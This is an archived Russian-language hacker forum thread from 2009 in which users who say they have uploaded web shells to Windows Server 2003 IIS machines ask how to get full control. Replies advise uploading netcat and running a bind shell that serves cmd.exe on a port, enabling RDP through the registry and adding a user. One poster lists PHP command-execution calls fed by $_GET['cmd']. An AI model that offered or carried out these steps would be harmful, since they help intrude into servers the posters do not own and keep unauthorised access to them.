Вход

Просмотр полной версии : Root Windows

M@rtein
28.10.2009, 21:37
Подскажите как происходит root виндовых серваков?
Залил шелл, стоит Microsoft IIS, операционка - Windows NT ABCD-SRV-01 5.2 build 3790
Как потом подключаться к такому серваку, по RDP?
Поиском пользовался, чето ничего не нашел.
Если где то обсуждалось, дайте ссылку пожалуйста.
$Atlet$
28.10.2009, 22:18
С шелла имеешь доступ в системную директорию? Проверь открыт ли порт 3389.
M@rtein
29.10.2009, 11:54
C:\Documents and Settings\M@rtein>telnet xxx.xxx.xxx.xxx:3389
Подключение к xxx.xxx.xxx.xxx:3389...Не удалось открыть подключение к этому узлу, на порт 23: Сбой подключения
Доступ в системную директорию есть, а так же
Open base dir: OFF (not secure)
Silly.worm
30.10.2009, 22:00
M@rtein не получится у тебя так, пробуй через "mstsc".
(нужно набрать у себя на компе, пуск-->выполнить-->mstsc)
Если подключение пройдет то все ок и порт открыт. (попросит ввести логин и пароль)
M@rtein
31.10.2009, 13:53
Silly.worm не удаеться подключиться к удаленному компьютеру
Что еще можно попробовать?
p.r0phe.t
02.11.2009, 08:30
Цитата:
C:\Documents and Settings\M@rtein>telnet xxx.xxx.xxx.xxx:3389
Подключение к xxx.xxx.xxx.xxx:3389...Не удалось открыть подключение к этому узлу, на порт 23: Сбой подключения

Ты на телнет конектишься,синтаксис:
C:\Documents and Settings\M@rtein>telnet xxx.xxx.xxx.xxx 3389 (через пробел),но телнетом не выйдет к этому порту приконектиться,юзай виндовый клиент RDP.

Выполни команду netstat -a,глянь какие порты слушаются.
Залей неткат,выполни nc -l -p 31333 -t -e cmd.exe
конекться телнетом на этот порт.

И ещё почитай:
https://forum.antichat.ru/thread36042.html

Если порт RDP закрыт, по статье открой его в реестре,добавь юзера и радуйся.
Удачи.
M@rtein
02.11.2009, 21:04
exec($_GET["cmd"]);
popen($_GET["cmd"]);
exec($_GET["cmd"]);
passthru($_GET["cmd"]);
proc_open($_GET["cmd"]);
shell_exec($_GET["cmd"]);
pcntl_exec($_GET["cmd"]);

На данном этапе все упирается в то что не работают абсолютно команды....
_gr34t
08.11.2009, 08:32
да и у меня такая же проблема, хакнул сервак, стоит винда Windows NT XXX 5.2 build 3790

safe_mode=Off
disable_functions=Off
ComSpec=C:\WINDOWS\system32\cmd.exe
Доступ в C:\WINDOWS\ есть, файл system32\cmd.exe есть, проверял, но комманды не выполняются никак :(
_gr34t
08.11.2009, 15:20
Неужели никто не знает почему команды не выполняется??

Или подкиньте статью почитать про получение удалённого доступа на Win или повышение привилегий.